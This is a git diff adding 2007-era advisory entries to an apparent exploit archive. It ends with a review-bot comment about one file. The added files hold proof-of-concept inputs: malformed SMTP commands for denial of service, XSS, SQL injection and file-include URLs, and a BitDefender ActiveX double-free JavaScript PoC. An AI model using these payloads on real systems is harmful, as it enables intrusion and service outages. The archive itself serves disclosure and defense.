diff --git a/files.csv b/files.csv
index f8b0c57f7..97c4095a9 100755
--- a/files.csv
+++ b/files.csv
@@ -27706,3 +27706,12 @@ id,file,description,date,author,platform,type,port
 30880,platforms/php/webapps/30880.txt,"Bitweaver 1.x/2.0 search/index.php highlight Parameter SQL Injection",2007-11-10,Doz,php,webapps,0
 30881,platforms/php/webapps/30881.txt,"PHP-Nuke 8.0 autohtml.php Local File Include Vulnerability",2007-11-10,d3v1l,php,webapps,0
 30882,platforms/hardware/remote/30882.txt,"Thomson SpeedTouch 716 URL Parameter Cross-Site Scripting Vulnerability",2007-11-10,"Remco Verhoef",hardware,remote,0
+30883,platforms/windows/remote/30883.js,"BitDefender Antivirus 2008 bdelev.dll ActiveX Control Double Free Vulnerability",2007-11-11,"Lionel d'Hauenens",windows,remote,0
+30884,platforms/php/webapps/30884.txt,"XOOPS 2.2.5 register.php Cross-Site Scripting Vulnerability",2007-11-12,"Omer Singer",php,webapps,0
+30885,platforms/multiple/dos/30885.txt,"QK SMTP Server Malformed Commands Multiple Remote Denial of Service Vulnerabilities",2007-12-13,"Juan Pablo Lopez Yacubian",multiple,dos,0
+30886,platforms/php/webapps/30886.txt,"MKPortal 1.1 Gallery Module SQL Injection Vulnerability",2007-12-13,"Sw33t h4cK3r",php,webapps,0
+30887,platforms/php/webapps/30887.txt,"phPay 2.2.1 Windows Installations Local File Include Vulnerability",2007-12-15,"Michael Brooks",php,webapps,0
+30888,platforms/php/webapps/30888.txt,"phpRPG 0.8 /tmp Directory PHPSESSID Cookie Session Hijacking",2007-12-15,"Michael Brooks",php,webapps,0
+30889,platforms/php/webapps/30889.txt,"WordPress 2.3.1 Unauthorized Post Access Vulnerability",2007-12-15,"Michael Brooks",php,webapps,0
+30890,platforms/php/webapps/30890.txt,"Black Sheep Web Software Form Tools 1.5 Multiple Remote File Include Vulnerabilities",2007-12-14,RoMaNcYxHaCkEr,php,webapps,0
+30891,platforms/php/webapps/30891.txt,"Flyspray 0.9.9 Multiple Cross-Site Scripting Vulnerabilities",2007-12-09,"KAWASHIMA Takahiro",php,webapps,0
diff --git a/platforms/multiple/dos/30885.txt b/platforms/multiple/dos/30885.txt
new file mode 100755
index 000000000..832a15905
--- /dev/null
+++ b/platforms/multiple/dos/30885.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/26856/info
+
+QK SMTP Server is prone to multiple remote denial-of-service vulnerabilities that occur when handling malformed SMTP commands.
+
+An attacker can exploit these issues to crash the affected application, denying service to legitimate users.
+
+These issues affects QK SMTP Server 3; other versions may also be affected.
+
+HELO ../A/ * 950
+MAIL FROM: ../A/ * 950
+RCPT TO: ../A/ * 950
+data
+../A/ * 950
\ No newline at end of file
diff --git a/platforms/php/webapps/30884.txt b/platforms/php/webapps/30884.txt
new file mode 100755
index 000000000..f7e609720
--- /dev/null
+++ b/platforms/php/webapps/30884.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26835/info
+
+XOOPS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+XOOPS 2.2.5 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/xoops/modules/profile/register.php?>'">
\ No newline at end of file
diff --git a/platforms/php/webapps/30886.txt b/platforms/php/webapps/30886.txt
new file mode 100755
index 000000000..9ef39c4dc
--- /dev/null
+++ b/platforms/php/webapps/30886.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26860/info
+
+MKPortal is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in SQL queries.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+This issue affects MKPortal M1.1 RC1; other versions may also be vulnerable.
+
+http://www.example.com/index.php?ind=gallery&op=foto_show&ida=(sql)
\ No newline at end of file
diff --git a/platforms/php/webapps/30887.txt b/platforms/php/webapps/30887.txt
new file mode 100755
index 000000000..c5cb75d4f
--- /dev/null
+++ b/platforms/php/webapps/30887.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/26881/info
+
+phPay is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. The vulnerability resides in code that was intended to protect against file-include attacks. It was found that the protection routines may be bypassed on Windows installations.
+
+Exploiting this issue may allow an unauthorized user to view files and execute local scripts.
+
+http://www.example.com/phpayv2.02a/main.php?config=eregi.inc.php\\..\\admin\\.htaccess
+
+The following example was provided in cases where the PHP 'magic_quotes_gpc' directive is enabled:
+
+http://www.example.com/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.htaccess
\ No newline at end of file
diff --git a/platforms/php/webapps/30888.txt b/platforms/php/webapps/30888.txt
new file mode 100755
index 000000000..1b7520576
--- /dev/null
+++ b/platforms/php/webapps/30888.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/26884/info
+
+phpRPG is prone to two vulnerabilities:
+
+- An SQL-injection vulnerability
+- A vulnerability that lets remote attackers gain access to sessions.
+
+Exploiting these issues may allow an unauthorized user to steal sessions, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+This issue affects phpRPG 0.8.0; other versions may also be affected.
+
+http://www.example.com/phpRPG-0.8.0/tmp/
\ No newline at end of file
diff --git a/platforms/php/webapps/30889.txt b/platforms/php/webapps/30889.txt
new file mode 100755
index 000000000..08ba36696
--- /dev/null
+++ b/platforms/php/webapps/30889.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26885/info
+
+WordPress is prone to a vulnerability that lets unauthorized users read draft posts before they have been published.
+
+This issue affects WordPress 2.3.1; other versions may also be affected.
+
+NOTE: This BID is being reinstated because further investigation reveals that the application is vulnerable. The exploit URI supplied in the initial report was not sufficient to trigger the issue, which led to the vulnerability claim being refuted. However, follow-up information from the reporter included a URI that does trigger the issue.
+
+http://www.example.com/wordpress/index.php/wp-admin/
\ No newline at end of file
diff --git a/platforms/php/webapps/30890.txt b/platforms/php/webapps/30890.txt
new file mode 100755
index 000000000..e4415a19f
--- /dev/null
+++ b/platforms/php/webapps/30890.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/26889/info
+
+Black Sheep Web Software Form Tools is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+These issues affect Form Tools 1.5.0b; other versions may also be vulnerable.
+
+http://www.example.com/global/templates/admin_page_open.php?g_root_dir=http://www.example2.com
+http://www.example.com/global/templates/client_page_open.php?g_root_dir=http://www.example2.com
\ No newline at end of file
diff --git a/platforms/php/webapps/30891.txt b/platforms/php/webapps/30891.txt
new file mode 100755
index 000000000..34aa0dc8b
--- /dev/null
+++ b/platforms/php/webapps/30891.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/26891/info
+
+Flyspray is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+These issues affect Flyspray 0.9.9 - 0.9.9.3.
+
+http://www.example.com/index.php?do=index&dummy=dummy');alert('XSS');void('
+http://www.example.com/index.php?do=details&task_id=1174&details=');alert('XSS
\ No newline at end of file
diff --git a/platforms/windows/remote/30883.js b/platforms/windows/remote/30883.js
new file mode 100755
index 000000000..7bd24b0c9
--- /dev/null
+++ b/platforms/windows/remote/30883.js
@@ -0,0 +1,46 @@
+source: http://www.securityfocus.com/bid/26824/info
+
+A BitDefender Antivirus 2008 ActiveX control is prone a double-free vulnerability because of a flaw in the way that the 'bdelev.dll' library handles certain object data prior to returning it.
+
+Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
+
+this.Oleaut32 = new Array();
+this.Oleaut32["cache"] = new Array();
+this.base = "A";
+while (base.length<0x8000) base+= base;
+this.base = base.substring (0, (0x8000-6)/2);
+CollectGarbage();
+3
+// Fill the cache with block of maximum size
+for (i=0;i<6;i++)
+{
+this.Oleaut32["cache"].push(base.substring (0, (0x20-6)/2));
+this.Oleaut32["cache"].push(base.substring (0, (0x40-6)/2));
+this.Oleaut32["cache"].push(base.substring (0, (0x100-6)/2));
+this.Oleaut32["cache"].push(base.substring (0, (0x8000-6)/2));
+}
+this.bitdefender = new ActiveXObject('bdelev.ElevatedHelperClass.1');
+// free cache of oleaut32
+delete Oleaut32["cache"];
+CollectGarbage();
+// POC
+for (pid=0;pid<4000;pid+=4)
+{
+try
+{
+// Find first Module_Path
+var Module_Path = bitdefender.Proc_GetName_PSAPI (pid);
+// Display the original string in free block memory
+///////////////////////////////////////////////////
+alert (Module_Path); -> C:\Windows\... (exemple)
+/////////////////////
+// Uses free block
+var y = base.substring(0,Module_Path.length);
+// Display the result of the crushing of the memory
+/////////////////////////////////////////////////////
+alert (Module_Path); -> AAAAAAAAAAAA...
+/////////////////////
+break;
+}
+catch(e) {}
+}
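Review bot: The file is committed with a .js extension but is not parseable JavaScript as written: the advisory prose at the top sits outside any comment, a bare `3` follows the first `CollectGarbage()` call, and both `alert (Module_Path); -> ...` lines carry annotation text outside a comment, so the listing is an archival transcript of the advisory rather than a script. A one-line header stating that would save readers from trying to run or lint it, e.g. `// Archived PoC transcript for BID 26824; kept verbatim, not a runnable script.` The transcript names the control only by ProgID (`bdelev.ElevatedHelperClass.1`) and never records its CLSID, which is the value a defender needs to apply an Internet Explorer kill bit for the control; if the original advisory gave it, recording it in the header would make the entry more useful for mitigation, and the matching files.csv row should keep the same reference.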